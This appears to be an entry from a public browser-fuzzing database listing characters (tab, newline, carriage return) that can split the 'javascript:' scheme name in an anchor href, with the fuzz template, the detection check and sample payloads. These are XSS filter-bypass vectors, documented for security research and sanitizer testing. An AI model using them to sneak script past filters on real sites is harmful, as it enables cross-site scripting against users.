Characters that can be inserted in the middle of the JS protocol name

Created bycold-try

Created Apr 15, 2024

Updated May 11, 2025

Detecting browser...

CategoryURL Handling

VisibilityPublic

TypeXSS

CharsetUTF-8

Template used:

<a id="0" href="j$[chr]avas$[chr]crip$[chr]t:window">craft-me</a>

Code used after fuzz:

if (document.getElementById("0").protocol === "javascript:") { log($[i]) }

Sample payloads

<a id="0" href="j0x09avas0x09crip0x09t:window">craft-me</a>

<a id="0" href="j
avas
crip
t:window">craft-me</a>

<a id="0" href="j0x0Davas0x0Dcrip0x0Dt:window">craft-me</a>